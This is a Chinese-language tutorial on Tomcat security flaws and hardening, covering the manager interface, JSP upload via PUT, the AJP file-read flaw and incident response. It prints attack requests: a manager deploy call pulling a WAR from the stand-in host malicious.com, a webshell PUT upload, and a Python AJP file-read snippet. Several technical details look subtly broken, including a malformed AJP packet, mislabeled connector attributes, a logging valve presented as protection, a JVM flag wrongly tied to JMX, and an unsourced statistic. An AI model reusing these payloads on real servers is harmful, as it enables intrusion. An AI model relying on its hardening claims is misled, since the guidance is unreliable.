一、Tomcat安全漏洞全景图

作为开源Java Web容器，Tomcat因其轻量级特性被广泛应用于中小型应用部署。然而其默认配置与组件设计存在三类典型安全风险：

1. 配置类漏洞：管理接口暴露、默认凭证未修改、目录遍历等
2. 组件类漏洞：JSP引擎缺陷、EL表达式注入、WebSocket实现漏洞
3. 协议类漏洞：AJP协议缺陷、HTTP/2实现漏洞、SSL/TLS配置不当

某安全团队2023年统计显示，Tomcat相关漏洞占Web容器漏洞的37%，其中62%源于配置不当，28%为组件缺陷，10%涉及协议实现。这些漏洞可导致服务器沦陷、数据泄露、横向渗透等严重后果。

二、核心漏洞深度解析

2.1 管理接口暴露风险

默认8005端口（SHUTDOWN监听）、8080/manager/html路径暴露是常见安全隐患。攻击者可通过构造特定请求实现服务关闭或未授权访问：

POST /manager/html HTTP/1.1
Host: target.com
Authorization: Basic YWRtaW46
Content-Type: application/x-www-form-urlencoded
cmd=deploy&path=/test&war=http://malicious.com/exp.war

防御方案：

• 修改conf/server.xml中Connector的port属性
• 删除webapps/manager目录或配置IP白名单
• 使用<Valve className="org.apache.catalina.valves.RemoteAddrValve"限制访问源

2.2 JSP文件上传漏洞

当Tomcat启用PUT方法且未限制文件扩展名时，攻击者可上传JSP webshell：

PUT /test.jsp HTTP/1.1
Content-Type: application/octet-stream
<% out.println("Compromised"); %>

加固措施：

1. 在web.xml中添加安全约束：

   <security-constraint>
    <web-resource-collection>
        <url-pattern>/*</url-pattern>
    </web-resource-collection>
    <auth-constraint/>
   </security-constraint>

2. 禁用危险HTTP方法：

   <Connector ... allowTrace="false" disabledUploadTimeout="true"/>

2.3 AJP协议缺陷（CVE-2020-1938）

AJP连接器默认开启且缺乏认证机制，攻击者可直接读取应用文件：

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("target.com", 8009))
s.send(b'\x12\x34\x00\x01\x82\x00\x00\x00\x07/WEB-INF/web.xml')
print(s.recv(4096))

修复方案：

• 修改conf/server.xml禁用AJP或添加secretRequired属性：

  <Connector port="8009" protocol="AJP/1.3" secret="YOUR_SECRET" />

• 使用防火墙限制8009端口访问

三、安全加固最佳实践

3.1 基础配置加固

1. 版本管理：

   • 优先使用LTS版本（如9.0.x系列）
   • 定期检查安全公告，6个月内完成补丁升级

2. 文件权限控制：

   chown -R tomcat:tomcat /opt/tomcat
   chmod -R 750 /opt/tomcat/webapps
   find /opt/tomcat -type f -name "*.xml" -exec chmod 640 {} \;

3. SSL/TLS优化：

   <Connector port="8443" protocol="org.apache.coyote.http11.Http11NioProtocol"
           maxThreads="150" SSLEnabled="true">
    <SSLHostConfig>
        <Certificate certificateKeystoreFile="conf/keystore.jks"
                     type="RSA" cipher="HIGH:!aNULL:!MD5"/>
    </SSLHostConfig>
   </Connector>

3.2 运行时防护

1. 安全阀配置：

   <Valve className="org.apache.catalina.valves.ErrorReportValve"
       showReport="false" showServerInfo="false"/>
   <Valve className="org.apache.catalina.valves.RequestDumperValve"/>

2. 内存马防御：

• 定期审计/opt/tomcat/work/Catalina目录
• 使用-XX:+DisableAttachMechanism禁用JMX远程连接

1. 日志监控：

   <Valve className="org.apache.catalina.valves.AccessLogValve" 
       directory="logs" prefix="localhost_access_log" 
       suffix=".txt" pattern="%h %l %u %t &quot;%r&quot; %s %b" />

四、漏洞应急响应流程

1. 漏洞确认：

   • 使用Nmap扫描开放端口：nmap -sV -p 8005,8009,8080 target.com
   • 通过curl -I http://target.com/manager/html检测管理接口

2. 临时缓解：

   # 紧急关闭AJP服务
   sed -i 's/<Connector port="8009"/\<!--&/' /opt/tomcat/conf/server.xml
   systemctl restart tomcat

3. 根因分析：

   • 检查catalina.out日志中的异常请求
   • 使用jstack分析线程状态：jstack -l $(pgrep -f tomcat)

4. 补丁验证：

   • 搭建测试环境验证补丁兼容性
   • 使用OWASP Dependency Check扫描依赖库

五、安全开发建议

1. 代码层防护：

   // 防止目录遍历
   public boolean isValidPath(String path) {
    return !path.contains("../") && !path.startsWith("/");
   }

2. 部署规范：

   • 将/WEB-INF/目录权限设置为700
   • 禁用自动部署功能：<Host autoDeploy="false" deployOnStartup="false"/>

3. 持续监控：

   • 配置Prometheus监控JVM内存使用
   • 使用ELK栈分析访问日志

通过系统化的漏洞分类、攻击路径还原及加固方案实施，开发者可显著提升Tomcat服务的安全性。建议建立每月安全审计机制，结合自动化扫描工具（如OpenVAS、Nessus）持续监测风险，形成安全闭环管理。